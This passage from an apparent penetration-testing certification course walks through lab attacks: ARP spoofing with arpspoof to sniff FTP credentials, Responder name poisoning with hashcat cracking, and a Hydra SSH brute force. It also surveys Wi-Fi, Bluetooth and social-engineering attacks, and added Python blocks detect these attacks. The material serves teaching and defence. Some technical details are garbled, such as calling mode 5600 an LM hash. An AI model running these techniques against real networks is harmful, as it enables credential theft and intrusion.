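    return hmac.new(password_key(password), challenge, hashlib.sha256).hexdigest()


FIXED_CHALLENGE = bytes.fromhex("1122334455667788")   # constructed constant challenge

WORDLIST = ["password", "Welcome1", "Summer2023!", "letmein", "P@ssw0rd"]   # constructed


def build_lookup_table(wordlist, challenge):
    """Precompute response -> password for ONE challenge value.

    This is the 'database of hashes' the course mentions: it is only useful
    when the verifier keeps sending that same challenge.
    """
    return {challenge_response(pw, challenge): pw for pw in wordlist}


def recover_password(table, observed_response):
    """Look a captured response up in the precomputed table (None if no match)."""
    return table.get(observed_response)


def demo_fixed_vs_random(victim_password="Summer2023!"):
    """Return (password recovered under a fixed challenge, under a random one)."""
    table = build_lookup_table(WORDLIST, FIXED_CHALLENGE)
    # Rogue verifier that always sends the same challenge: response is predictable,
    # so one precomputed table maps it straight back to the password.
    fixed_hit = recover_password(
        table, challenge_response(victim_password, FIXED_CHALLENGE))
    # Honest verifier picks a fresh random challenge: the same table is useless,
    # which is the mitigation side of the story (unpredictable per-session challenge).
    random_hit = recover_password(
        table, challenge_response(victim_password, os.urandom(8)))
    return fixed_hit, random_hit


if __name__ == "__main__":
    print(demo_fixed_vs_random())   # ('Summer2023!', None)
```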
Again, we are going to see how to do this, capturing the password, the user and the password, so we are going to crack it, but we could very well use Responder itself to perform a pass-the-hash attack. So in this video we learned more about the NetBIOS protocol, the NetBIOS suite of protocols that Microsoft implements; we discussed how it works and also a couple of ways of actually leveraging this protocol, which has some known vulnerabilities. I hope you enjoyed this video, thank you very much. Hello, welcome to
module 7. This is our third video, and this is going to be actually a very short video, but we just need to talk a little bit about wireless networks. Most of the time when you're studying pen testing or hacking or security you tend to focus on wired networks, and there is a very good explanation for that: the reason being that when you are performing these high-level tasks, high-level activities, you are actually focusing on companies, not on residential solutions but enterprise solutions, and although companies do use wireless networks, their
core is not composed of wireless devices but wired devices. But still we have to keep in mind that any type of pen testing or attacking tasks, hacking tasks, must initiate by gathering information, so acquiring information that is being transmitted from or to desktop devices is also very important, which means that even though wireless networks are not the best solutions in regards to performance, they are still around, they are very much used by the end users; actually it keeps growing and growing, and nowadays it's even hard to see desktops, or at least
laptops, plugged into the wired network. And obviously, because the CompTIA PenTest+ exam requires us to know some security features and pen testing resources that you have available in regards to wireless networks. Now observe that I'm not mentioning Wi-Fi networks, I'm generalizing as wireless networks. So let's start with the most traditional standard that we have, which is Wireless Fidelity, Wi-Fi. There are different types of attacks that you can perform against Wi-Fi networks, but let's just mention a couple here that are very common. One is called evil twins; evil twins is also
known as cloning, Wi-Fi cloning. Basically what you do here is bring an access point, which can actually be your own laptop as long as you have a system such as Linux running on it and you can install some pen testing tools; you could for example run Kali Linux, which has a software called Kismet that would help you to do this, which is to fake your machine and make it behave as an access point. Obviously you can also bring your own access point to the network, you could do that, but then
what you would have to do is configure your access point to broadcast a network with the same name, with the same BSSID, as the actual Wi-Fi network that exists in that network. So let's say that you are in a premises where the Wi-Fi network is called company ABC, okay; what would you have to do? You just have to configure your access point with that BSSID, well, actually SSID and BSSID, so you'd have to clone the information that belongs to the access point
that already exists there. That would be the first step, obviously, but wait, that's not enough. If you do that, what's going to happen is there will be two access points with the same network name, which is okay, it exists, that's perfectly fine, but the problem is if you do that you can still have the laptops, for example, the clients, still connecting to the original access point, not to your own access point. So what can you do then? You can send a deauthentication signal to those clients; the clients would just accept it because it's coming from
what they believe to be the access point that actually broadcasts the wireless connection. So they would be deauthenticated and then they would have to authenticate again; at this moment, depending on where you placed your access point, some devices would connect to your device and you then start capturing the traffic that is being sent by those clients. Another problem that we have in Wi-Fi networks is their keys, the level of security used by their keys. Nowadays it's not that common to see Wi-Fi
networks implementing WEP, nor WPA; it's very common to see WPA2, but they are still around, mostly WPA with a pre-shared key, not enterprise WPA. So the problem with that is, well, if you find a network that uses a WEP type of key, that's very easy to crack; you can simply use the aircrack-ng suite, which is a suite, it's not just a single software, it's a suite of software, but if you find it then it would be easily cracked. If you find a network that uses a WPA pre-shared
key it's still crackable, but it's not that easy; it's going to take a very long time for sure and you need a lot of traffic going on in that network. You're going to have to capture packets, you're going to have to replay packets, and you're going to have to work in an environment where you are not only collecting beacons, collecting authentication packets, but you have to replay that to force the three-way handshake a very large number of times; then you can try to crack that key, crack that password. Now moving to Bluetooth: the CompTIA
PenTest+ exam also requires you to know some vulnerabilities or attacks in a Bluetooth network, a wireless network, and the most common ones are bluesnarfing and bluejacking. Bluesnarfing is when, using a device that supports the Bluetooth protocol, you can gather, retrieve, the contact list of another device, another Bluetooth device that has Bluetooth enabled, obviously, and that is open to everybody; so you can remotely grab their contact list. And another one is bluejacking; bluejacking is a way of hijacking a Bluetooth session. And in regards to RFID,
the most common ones are cloning, jamming and repeating, which are very self-explanatory. So cloning is similar to evil twins, and it's actually very common nowadays; for example, let's say that you go shopping and you need a new wallet and you find a wallet that says that it's RFID cloning protected; that means that that wallet implements, at some level, a security feature that will prevent a device from cloning your RFID signal. Jamming is when you use signals to jam an RFID connection, an RFID communication,
and repeating is a type of attack in which you are going to repeat a signal that you managed to acquire previously. So let's say that you somehow managed to grab, you detected, an RFID signal coming from a specific RFID device; you grab that signal and you copy it, and later on you repeat that signal, you emit that signal once again, in order to authenticate with the other RFID controlling authentication device. So basically these are the most important concepts and vulnerabilities that you have to know for the CompTIA PenTest+ exam. In regards to tools,
the two tools that you have to be aware of are aircrack-ng and Kismet. So aircrack-ng is actually a suite of software, as I mentioned; if you have the opportunity you should try to use it. So basically some tools that you have there are airmon, which is a tool that will allow you to configure your interface in monitoring mode; that's the mode that your interface must be configured in in order to be able to capture traffic. You also have airodump, which is going to be the tool that
will actually capture the traffic; so first you have to configure promiscuous mode, or monitoring mode, then you have to actually grab, sniff, the packets. You also have aireplay, which is used to replay the traffic that your interface captures, and you also have aircrack, which will try to crack the password of that network. So I hope you enjoyed this video; it's very important that you go through some concepts about wireless networks to get ready for the CompTIA PenTest+ exam. Thank you very much. Hello,
Welcome to video 4 of module 7. This video will be focused on tools; it will be a hands-on video. We are actually going to analyze a few tools. Those tools are Responder, and we're going to combine Responder with hashcat. The reason we're going to do that is because we will use Responder to capture the hash sent by a Windows machine using the NetBIOS protocol. Once we have that hash we're going to hand it over to hashcat in order to try to crack that password. So that's going to be one tool. Another tool that we'll also use is going to be arpspoof; actually we're going to see arpspoof first. The idea here will be to show how you can ARP spoof a device in order to capture the traffic that it's transmitting, and we'll combine that with the FTP protocol. So we're going to perform an FTP access from an original Windows 2008 machine, and we'll see that the Kali Linux machine will be able to implement arpspoof and capture that traffic. We're actually going to see the username and password because, like we've learned before, the FTP protocol does not use encryption. And then we'll get to know a tool called Hydra. Hydra is a cracking tool; it will help you perform brute force attacks. It combines credentials, usernames and passwords, in order to crack a service, in order to get access to a specific service. We are going to use Hydra with SSH, so we'll try to crack the password of an SSH server.

So let's start off with arpspoof. The scenario that I have here is this: my Kali Linux machine has this IP address right here, 192.168.0.20, and we can also see that my router is 192.168.0.1. Now let's go to my target machine, which is this Windows 2008 server here, the same one that is running Metasploitable; actually it is an instance of Metasploitable. So this machine has IP address 192.168.0.22 and we can also see that the gateway is the same one, 192.168.0.1. So let's just picture a scenario here. Imagine that this is a machine, a desktop, and this one right here is a machine that I was able to insert into that network. So obviously I am using a Kali Linux machine; it could be my own laptop, because I managed somehow to get physical access, or it could be just another desktop that I managed to get access to, to control it, for example using the reverse TCP attack that we saw in the previous module.

So the way that we can do this is, well, first of all you have to make sure that you have this software here installed in a Linux system: dsniff. You need dsniff in order to run arpspoof, because arpspoof comes in that package, so make sure you have it installed first. Then it's pretty simple actually: you can simply do arpspoof -i and the interface, which will capture traffic and also implement the ARP spoof attack. So what is the scenario here? My target, which I will identify with the -t switch, is 192.168.0.22. That's my Windows machine, that's my target. I want to capture traffic that is being sent to and sent from that machine when it communicates with 192.168.0.1, which is my router.

So what is actually going on here, what is happening here? What I'm saying is: whenever machine 192.168.0.22 asks for IP address 192.168.0.1, I will reply to that target machine, which is .22, the client, the Windows client, saying "hey, I have IP address .0.1, I am your gateway, and here is my MAC address." That's because in a local area network the communication is established via a data link protocol, so MAC addresses are used, not IP addresses; the IP addresses are converted into MAC addresses. Okay, so I am going to run it. There it is.
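The explanation above is also exactly what a defender can key on: after arpspoof starts, the gateway's IP is suddenly claimed by two different hardware addresses, and one MAC starts answering for more than one IP. The following detector is an added example, not code from the course; it walks a list of observed ARP replies and raises alerts on those three symptoms. The ArpReply records and the MAC addresses are constructed sample data (the IPs mirror the lab: .20 attacker, .22 victim, .1 gateway), and TRUSTED is an assumed pinned mapping a defender would take from the real gateway.

```python
"""Detect ARP cache poisoning from observed ARP replies (added example).

arpspoof answers "who has 192.168.0.1?" with the attacker's MAC. On the
wire that shows up as (1) a pinned IP->MAC mapping being contradicted,
(2) an IP changing hardware address mid-capture, and (3) one MAC
claiming several IPs. All sample data below is constructed.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    ts: float        # seconds since capture start (constructed)
    sender_ip: str   # IP address the reply claims ("is-at")
    sender_mac: str  # hardware address making the claim


# Constructed sample: the real gateway answers first, then the .20 host
# starts answering for .1 as well (what arpspoof -t .22 .1 produces).
SAMPLE_REPLIES = [
    ArpReply(0.0, "192.168.0.1",  "aa:aa:aa:aa:aa:01"),
    ArpReply(0.5, "192.168.0.22", "aa:aa:aa:aa:aa:22"),
    ArpReply(1.0, "192.168.0.20", "aa:aa:aa:aa:aa:20"),
    ArpReply(5.0, "192.168.0.1",  "aa:aa:aa:aa:aa:20"),  # spoofed
    ArpReply(7.0, "192.168.0.1",  "aa:aa:aa:aa:aa:20"),  # spoofed
]

# Assumed pinned mapping: the gateway's genuine MAC, recorded in advance.
TRUSTED = {"192.168.0.1": "aa:aa:aa:aa:aa:01"}


def detect_arp_spoof(replies, trusted=None):
    """Return a list of (kind, ip_or_ips, mac, ts) alerts."""
    trusted = trusted or {}
    first_seen = {}                  # ip -> first MAC that claimed it
    ips_per_mac = defaultdict(set)   # mac -> every IP it claimed
    alerts = []
    for r in replies:
        mac = r.sender_mac.lower()
        ips_per_mac[mac].add(r.sender_ip)
        # 1. A pinned mapping is contradicted.
        if r.sender_ip in trusted and trusted[r.sender_ip].lower() != mac:
            alerts.append(("trusted-mismatch", r.sender_ip, mac, r.ts))
        # 2. The same IP is claimed by a different MAC than before.
        prev = first_seen.setdefault(r.sender_ip, mac)
        if prev != mac:
            alerts.append(("ip-mac-changed", r.sender_ip, mac, r.ts))
    # 3. One MAC claims several IPs (its own plus the gateway's).
    for mac, ips in ips_per_mac.items():
        if len(ips) > 1:
            alerts.append(("mac-claims-multiple", ",".join(sorted(ips)), mac, None))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_REPLIES, TRUSTED):
        print(alert)
```

On a real host the same three checks can be fed from a packet capture or from periodic snapshots of the neighbour table; the mitigation counterpart is to pin the gateway entry statically (arp -s or ip neigh on Linux) and, on managed switches, to enable dynamic ARP inspection so spoofed replies never reach the client.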
It is ARP spoofing now. That's not enough. When I do this I'm simply saying: hey, if that client asks for this IP address, I will reply with this MAC here; I will say that I am the IP address and I have this MAC right here. Okay, good. Now I also need another tool: I need Wireshark to capture traffic, I need a sniffer. So what I am going to do here is run Wireshark, and there we are; we need the administrator password to run it as root. Okay, there I am going to start capturing traffic, but it's going to give us a bunch of information which I don't want. I just want to see FTP traffic, so what I'm going to do here is to implement a filter: tcp, because I want to specify the port, that's going to be my filter, port 21, that's the FTP port. Since I'm specifying a port I have to use either TCP or the UDP protocol. I know that port 21, at least for the authentication process, occurs via port 21 TCP, so tcp.port == 21, right there. Okay, so Wireshark is capturing a bunch of stuff but I don't care, I just want to see the traffic associated with port 21.

Okay, good. Now I'm going to go there to my client machine and I will just pick a random FTP server, one that I know from the top of my head. I'm not going to hack it, so there is no problem to do it here; I'm just accessing an FTP server. I don't have the credentials; nothing wrong here. I am going to do this: for example, I know that this is an FTP server, and just a simple search on the web will give you this. Okay, and there in the back, right there, you can see that there are many FTP packets flowing, being captured. Now the FTP server will ask for my credentials: please inform me a password. I'm going to say "myuser". Oh, you could see that it captured something else back there. Now it's asking for the password; I'm going to say "mypass". Okay, now these are not valid credentials, as you can see right here: login failed. That's perfectly fine, I don't want to authenticate; I just want to show you that we're simulating a client, a valid, legit client, and I am performing a capture here. I am actually going to stop that capture as an attacker and let's take a look at the FTP packets. Let me go up here, let me start over here. Okay, so it's requesting, and let me open the FTP header right here. There it is. So first it asked for my username and then I informed that username right here, so PASS mypass, that's the password that I informed. We also have the USER, which is somewhere up here, probably here, let's see... no, so that's the hello... oh, there you go: USER myuser. Let's go down a little bit; it requires the password, so I inform that password, PASS mypass, as I informed there. A very simplistic way of capturing traffic that is not encrypted. That is how you can implement arpspoof and also take a look at the packets, the content of the packets that are being transmitted if they're not encrypted. I am now going to close this, and let's take a look at another attack. I'm going to close this as well.

Now the attack we're going to look into is an attack against the way that Windows systems actually communicate with other Windows systems using the NetBIOS protocol. So you may remember that whenever a Windows machine wants to access resources of another Windows machine it will say: hey, I want to access some resources that you have, but to do that I need to authenticate, so you need to send me a challenge. When you send me the challenge I will reply to that challenge. Ideally and theoretically, since only the two of us know that challenge, I will be the one to answer that challenge to you. But let's see that it's not quite how it happens. What I am going to do here is run Responder, and one way of running Responder is using these switches here, -wfr. That is a way that you can run Responder in an automated way: it will automatically respond to any NetBIOS search request that happens. It will say "hey, here I am, I am that guy, I am that Windows machine that you are trying to access, and here's the challenge. Okay, answer my challenge, give me your hash, and then you'll be able to access my resource if you answered that challenge properly." Okay, very good. You also have to specify the interface on which you'll be listening to the NetBIOS packets, so I'm using -I eth0; that's my interface. I am going to run it and you're going to see here, if I scroll up, you're going to see: hey, this is Responder, this is what I am running. So I'm running these poisoners for these protocols, I'm running these servers, HTTP, HTTPS servers, WPAD server, SMB server, all this stuff that I am running, and this is my information: eth0, that is my IP address, the challenge is set to random, it's a random value. Okay, oh, there you go, so we already have some NetBIOS information flowing and we can see here that Responder poisoned an answer sent to that IP address right there, 192.168.0.12. Okay, but that's not what I actually want, because what I want is this: I am now going to come to this machine right here, and let's just say that this client here, this Windows 2008 server, wants to access that share; it actually wants to map that shared folder TMP, that's the shared folder which belongs to the anywin machine, and I want to map it to the F: drive. To do that I need to authenticate; well, you could inform a guest or you can actually send a valid username and password. So let's assume that in this scenario what I actually want to capture is this: I want to see if there is any machine trying to access another machine, and that shared folder, that resource that is being accessed, requires credentials; I want to capture credentials. Okay, so when I say "I", it's me as an attacker here in my Kali Linux machine, and now I just want to perform a legit access as a client, as a Windows client, to access this resource, which probably could be a valid resource. So let's just assume that the anywin machine does exist in the network, it does share a folder called TMP, and the username is user1 and the password is pass. Okay, I'm going to run it, and there we go: it shows to me "access is denied", and well, as a client I may look at it and say, hey, did I inform anything wrong here, what's going on? Probably the user will not suspect that this is an actual attack; something just happened in the network, maybe that folder is not shared anymore, maybe that user is not valid anymore, whatever it is. I now, as an attacker, have this information right here. So let's take a look at that information: so hey, I'm poisoning, so "poisoned answer sent to 192.168.0.22 for name anywin". So that client was trying to access this machine here, anywin, and that client is this machine, and it's informing user1 as its user, and the password is actually right here, but it's a hash, right? I can't read it, but what I can do is copy this information right here; I will copy selection. Okay, I am going to just finish this. I am going to edit this file here and paste selection and save it. Okay, so I just created a random file called hash.txt and I pasted that hash in there. What I'm going to do now is to run my hashcat tool. Now, how to use the hashcat tool: you use hashcat -m; -m specifies the hash algorithm, so each hash algorithm has a specific identifier; in the case of a Windows LM hash it's identified by this code, 5600. Then I inform the file that has my hash, which is hash.txt, and then I inform my database, my rainbow table, the file that has names, usernames and passwords associated with hashes. Okay, I run it, and it can take a while, it can be quick; let's see what happens here. Well, actually it scrolled all the way down, which does not give me too much useful information, but something that is very interesting here is the status: cracked. Well, if it's been cracked, where is that password? I am going to scroll up here, and up here it's showing me the username, the hash,
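The reason Responder gets an answer at all is the behaviour described above: the Windows client broadcasts "who is anywin?", and whoever replies first becomes the "server" that issues the challenge. That same behaviour gives defenders a clean signal. On a healthy LAN a host answers name queries only for its own name, so a host that answers for many unrelated names, or for a canary name the defender resolves on purpose and knows does not exist, is poisoning. The detector below is an added example, not part of the course; the NameAnswer records, the FILESRV names and the canary name are constructed, and the IPs follow the lab (.20 is the Kali machine).

```python
"""Spot an LLMNR/NBT-NS poisoner from name-resolution answers (added example).

Responder replies to every broadcast name query with its own address.
Two cheap indicators: one responder IP answering for many distinct
names, and any answer for a canary name that should not resolve.
All records below are constructed sample traffic.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class NameAnswer:
    query_name: str    # name the client asked for
    responder_ip: str  # host that claimed to be that name
    proto: str         # "NBNS" or "LLMNR"


# Constructed sample: .5 is a real file server answering for itself;
# .20 answers for everything it sees, including a typo and the canary.
SAMPLE = [
    NameAnswer("FILESRV",   "192.168.0.5",  "NBNS"),
    NameAnswer("ANYWIN",    "192.168.0.20", "NBNS"),
    NameAnswer("WPAD",      "192.168.0.20", "LLMNR"),
    NameAnswer("FILESRV1",  "192.168.0.20", "NBNS"),   # typo of FILESRV
    NameAnswer("CANARY-X9", "192.168.0.20", "LLMNR"),  # nobody should answer this
]

# Assumed canary: a name the defender queries periodically and that no
# legitimate host owns. Any answer is a poisoner by definition.
CANARY_NAMES = {"CANARY-X9"}


def find_poisoners(answers, canaries=CANARY_NAMES, min_names=3):
    """Return {responder_ip: [reasons]} for hosts that look like poisoners."""
    names_by_ip = defaultdict(set)
    canary_hits = defaultdict(set)
    for a in answers:
        name = a.query_name.upper()
        names_by_ip[a.responder_ip].add(name)
        if name in canaries:
            canary_hits[a.responder_ip].add(name)

    suspects = {}
    for ip, names in names_by_ip.items():
        reasons = []
        if ip in canary_hits:
            reasons.append("answered canary " + ",".join(sorted(canary_hits[ip])))
        if len(names) >= min_names:
            reasons.append(f"answered {len(names)} distinct names")
        if reasons:
            suspects[ip] = reasons
    return suspects


if __name__ == "__main__":
    for ip, reasons in find_poisoners(SAMPLE).items():
        print(ip, "->", "; ".join(reasons))
```

The detection only matters as a backstop: the fix that removes the attack surface is to disable LLMNR and NetBIOS name resolution on clients by policy, so a typo'd share name produces a DNS failure instead of a broadcast that anyone on the segment can answer, and to require SMB signing so a captured exchange cannot simply be relayed.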
and at the end there it is: the password is pass, as I informed right here. So that is how you can crack this type of hash, a NetBIOS hash.

Now we will also take a look at another type of attack, which is a brute force attack for SSH connections, SSH servers. To do that we are going to use software called Hydra. I recommend that you take a look at its help page, and here you can actually see an example, and basically that's all that you need. Obviously you can work with some additional options here, but that is actually what you need. The only thing that I would recommend you add here is the -t option, which determines the number of concurrent processes that will run, so it will make it faster. But basically that's what you do: you run hydra; in case you want to try to crack the password of a specific user, you use the -l option, so -l and the username, and then obviously you want to have a possible passwords database, a database of passwords, which must be a text file. Okay, and you're actually going to see that Kali Linux already comes with a bunch of those. So I use the -P option and then that password list file, and then, if you want to specify the -t option with the number of processes, you can, and then you specify the protocol and then the target machine. So as you can see, you can use Hydra to try to crack a password for different services, different protocols; here in this example we see FTP. The only difference is that we are going to run it against an SSH server. Now obviously, to make sure that it works, I have to be certain that the SSH service is running on that target machine; in this case the same Kali Linux machine is my target. I am going to try to hack the "hacked" user, so I created that user and I defined its password as 123456, so that's the password, and here is a very large list file with a list of possible passwords. You can find others in this directory. So if I, oops, let me cancel here; if I list the content of that directory we are going to see a few. Now observe that I actually have directories here; aside from rockyou.txt we have other directories and we have other lists inside those directories, so many files there. Okay, so that is what I am going to do, and since it's a very simple password obviously it goes at the top of the list, the rockyou.txt list. So there it is. Okay, let's see what it says. It says "please do not use in military or secret service organizations or for illegal purposes"; a max of four tasks, four processes per one server, which means that we have an overall of four simultaneous tasks; we are attacking the SSH server localhost port 22. Okay, so here is a summary: port 22, that's the host, the login that you asked me to try to crack is "hacked", and there you go, I was able to crack it. When I tried to access it with the "hacked" user and informing password 123456 it worked, so the result is
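A run like the one above, four parallel tasks walking a wordlist against one login, leaves a very recognisable trail in the SSH server's log: a burst of "Failed password" lines from one source address, often followed by an "Accepted password" once the right entry is reached. The script below is an added example, not code from the course or from Hydra; it parses sshd auth-log lines in the standard syslog format and flags a source that fails at least `threshold` times inside `window_s` seconds, noting whether a successful login followed the burst. The log lines are constructed to resemble the lab (target localhost, user "hacked"); the timestamps, PIDs and ports are made up.

```python
"""Detect an SSH password brute force from sshd log lines (added example).

Parses the standard sshd "Failed password" / "Accepted password" lines,
groups failures per source IP, and alerts on a burst of failures within
a time window. A success shortly after the burst is flagged separately,
because that is the case that needs an incident response, not a block.
Sample log lines below are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)

# Constructed sample: a Hydra-style burst against "hacked" (and a guess at
# a nonexistent "admin") from 127.0.0.1, then one ordinary typo by alice.
SAMPLE_LOG = [
    "Mar 12 10:00:01 kali sshd[1201]: Failed password for hacked from 127.0.0.1 port 51001 ssh2",
    "Mar 12 10:00:02 kali sshd[1202]: Failed password for hacked from 127.0.0.1 port 51002 ssh2",
    "Mar 12 10:00:03 kali sshd[1203]: Failed password for invalid user admin from 127.0.0.1 port 51003 ssh2",
    "Mar 12 10:00:04 kali sshd[1204]: Failed password for hacked from 127.0.0.1 port 51004 ssh2",
    "Mar 12 10:00:05 kali sshd[1205]: Failed password for hacked from 127.0.0.1 port 51005 ssh2",
    "Mar 12 10:00:06 kali sshd[1206]: Failed password for hacked from 127.0.0.1 port 51006 ssh2",
    "Mar 12 10:00:09 kali sshd[1210]: Accepted password for hacked from 127.0.0.1 port 51007 ssh2",
    "Mar 12 10:03:00 kali sshd[1300]: Failed password for alice from 192.168.0.30 port 40001 ssh2",
    "Mar 12 10:03:05 kali sshd[1301]: Accepted password for alice from 192.168.0.30 port 40002 ssh2",
]


def parse_line(line, year=2024):
    """Return (timestamp, result, user, ip) or None for non-auth lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines, threshold=5, window_s=60):
    """Return {ip: {"failures", "users", "success_after_burst"}} for bursty sources."""
    fails = defaultdict(list)
    accepts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, result, user, ip = rec
        (fails if result == "Failed" else accepts)[ip].append((ts, user))

    alerts = {}
    for ip, events in fails.items():
        times = sorted(t for t, _ in events)
        burst_end = None
        # Sliding window: find the first run of >= threshold failures within window_s.
        for i in range(len(times)):
            j = i
            while j + 1 < len(times) and (times[j + 1] - times[i]).total_seconds() <= window_s:
                j += 1
            if j - i + 1 >= threshold:
                burst_end = times[j]
                break
        if burst_end is None:
            continue
        followed = any(0 <= (t - burst_end).total_seconds() <= window_s
                       for t, _ in accepts.get(ip, []))
        alerts[ip] = {
            "failures": len(times),
            "users": sorted({u for _, u in events}),
            "success_after_burst": followed,
        }
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

The same logic is what tools like fail2ban automate with a ban action, but the cheaper defence is to make the guess space irrelevant: disable password logins in sshd_config (PasswordAuthentication no), keep MaxAuthTries low, and the speaker's 123456 password never becomes reachable in the first place.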
one of one target successfully completed, one valid password found. So that's the result; that's how you can use a brute force tool in order to crack passwords. So in this video we actually saw how to work with Responder, we saw how we can ARP spoof a target and then capture traffic that is being sent to and from that specific target, and we also saw how we can brute force services. I hope you enjoyed this video. Thank you very much.

Hello guys, welcome to module 8. Our topic in this module is going to be social engineering, more specifically understanding at least the most important or most used social engineering attacks. So first of all we have to understand what social engineering is, and it's actually a pretty simple concept. The idea of social engineering, in regards to hacking, started with Kevin Mitnick. Kevin Mitnick was a wizard of the hacking world, and according to himself one of the reasons why he was so successful was because he understood that hacking is not just about technical abilities but also the social abilities: you have to understand people, and most of all you have to make people trust you. That will help you gather information that is going to be very important when it comes to the point where you are actually going to use the tools that you're willing to use. So basically social engineering is the usage of techniques that will allow you to gather information, but you collected that information from human resources, from other human beings, for example employees that work for that specific company that you're targeting.

Now let's talk about some of the most important social engineering attacks, and we can see this picture here of someone jumping into a trash can, which is known as dumpster diving. Dumpster diving is exactly that: it's when you, as an attacker or as a pen tester, will try to find information in a trash can, for example, or in a dumpster. It's very common to see people, instead of shredding papers, just throw the paper away, so that is one way that you can find information, because in many situations some papers that are thrown away have information that at least doesn't look important to the employee but is important to you as a pen tester. For example, let's say that there is an invoice, and that invoice shows information such as who is responsible for purchasing products for the company; also it may show some information about what the company has purchased. Let's say that it's a new device such as a new server. Well, if a new server is being purchased, there is a very high probability that there is a point of contact from the company that is selling that server with your client, which means that you can then make use of that to perform another social engineering technique such as impersonation, which we'll talk about.

Shoulder surfing: it's very common to see this type of attack. That's when someone goes to the ATM and that person is typing the PIN number and there is an attacker trying to see over that person's shoulder, trying to see what the person is typing to retrieve that PIN number. Same thing for keyboards: trying to see someone typing the password.

Lock picking: this is a common type of attack; it's more associated with a physical attack than social engineering, but it involves social engineering as well. For example, if you're simply lock picking, you have a master key that you will try to use to open a door and enter the company's premises; okay, that's just the old, traditional lock picking. But as you've probably seen in movies or TV shows, an attacker is faking that that person is taking pictures, for example, or filming a scenario, but actually that person is using the camera to try to take a photo of someone's card, someone's personal card, and that personal card may have information that could be used; for example, if it's the personal ID, that tag with that person's name, company ID, photo, the attacker may forge it, may make a copy of that. We also have lock picking in regards to RFID cards, so you may use a device that will copy the signal that is issued by someone's RFID card; you can then manufacture your own RFID card with that same signal, with that same ID.

Eavesdropping is also very common and something that we always see in the movies; very effective. That's when you try to get close to someone that works for the company, so you get close to an employee, or close enough to, I don't know, a director, and you try to listen to that person's conversation, or those people talking, and you can try to retrieve information out of that conversation. That is eavesdropping.

Persuasion or elicitation: that's when you try to persuade someone that probably has information to tell you part or most, maybe even the entire information that you're looking for. So for example, you as an attacker try to make it casual; you are talking to someone that works for that company and then you start just chit-chatting until you get to the point that will allow you to gather information that may be used. For example, you start chit-chatting and then you start talking about the company: "oh, it's such a nice company, but I didn't really know that this company was so large, you have so many employees," so you're trying to make that person talk, tell you more about the company: "oh yeah, it's a large company, so we have 200 employees, that person John Doe is our CEO, and this is what I do, my name is whatever." So you're persuading someone to give you information. Now we cannot confuse this with impersonation; we have to understand the difference.

We also have, now in a more technical aspect, phishing. Phishing is pretty simple actually; that's what we see every day, it's in our daily tasks to actually analyze it and just discard it. So every day you are getting spam emails, and phishing is actually spam: that's when you get an email with a link, and that link will bring, let's say, a trojan horse or a backdoor, or will start a backdoor or a virus on your machine, and then the attacker will be able to do whatever once you have that software installed on your machine. Now it's different from pharming. Usually pharming is an attack that is broadcast by emails, so you as an attacker send a bunch of emails to different employees,
but you're not actually trying to force that person or lure that person to download a file, because, well, I know that these people here are security savvy, so they are not going to simply download a file that is attached to a weird email. So what do you do? You send an email, but you have to make that email look legit; that's the first thing. So you have to send an email and you fake the origin, you fake the source, so there are techniques that will allow you to send an email that will appear to the recipients as if the CEO is actually sending this email, and then you can say, for example: "hey, I need you guys to access our intranet website because you have to log in there and change your information, because we are updating our system, so you have to go there and update your data." Now phishing should also make use of that reliability, so you should also make use of trust: try to send that email from a source that is trusted by the recipients. But again, the difference between phishing and pharming is that phishing will try to lure the target to download a file, whereas with pharming the idea is not to force that person to download a file but to click a link that will redirect that person to a fake website, and that website must look exactly like the original one.

Now impersonation. Impersonation is different from persuasion; that's when you are impersonating someone. So for example you, as an attacker, grab the phone, you call the project manager's secretary, and then you say: "hey, this is John, I'm working with..." and then you mention the project manager's name, "I'm working with him, but he asked me to do something right now, he needs it right now, but I still need information that he was supposed to send to me but he didn't; can you help me with that?" So you are impersonating someone. It can be someone that works for the company, it can be someone from the outside, a provider for example, someone that is providing a service, but you are impersonating someone.

Now, similarly to impersonation, we have piggybacking, but piggybacking is actually a mixture of a physical attack with the impersonation social engineering attack. So if you put together impersonation and tailgating you have piggybacking; therefore first we have to understand what tailgating is. Basically this is a situation where, for example, you see someone entering the company, so that person has a card to open the door, swipes the card, goes in, and you try to just tailgate that person: go in, leverage that moment, and enter the premises as well. Now piggybacking is the idea of doing the same but using some social engineering skills in order to do that. So you start a conversation with someone during lunch time, for example, and then you say "hey, in which department do you work?" and that person will say, and then you say that you work for a different department. Obviously this will only work if it's not a small company, so you need to do it when there is a very small chance that the person could know everyone else in any other department. So you do that to then be able to enter the premises with that person.

Obviously we also have social media, and this is not a direct type of social engineering, but it is still a social engineering attack because you are making use of a resource that provides information, but that information is only given to you if the person actually wants. So for example Instagram: you can gather information from Instagram, but that's only because the person that owns the profile went there and posted those pictures, updated status, something like that.

We also have USB key drop, or key drops. As you can see in this image right here, you have a scenario where you create a flash drive that is infected with, for example, a reverse TCP trojan horse or a reverse TCP backdoor, as we studied and analyzed in a previous module, and then you just drop that flash drive somewhere, expecting someone to grab it at some point and try to plug it into that person's computer, out of curiosity for example, or because maybe that person thinks that it's his or her flash drive.

Okay, quid pro quo: that's when you do favors for someone in order to expect some kind of payment for that favor. So you help someone, but you're actually doing that in order to then be able to say "hey, remember when I did that for you? Please, I need your help now, I need this, I need that." Sometimes you don't even have to ask for it; just by facing that situation the target sees that you are requesting something and that person will just try to help you as a payment.

Similarly we have a rougher technique, which is bribery. So if you've got hold of critical information, information that is supposed to be secret to someone or to the company, you can use that information as leverage.

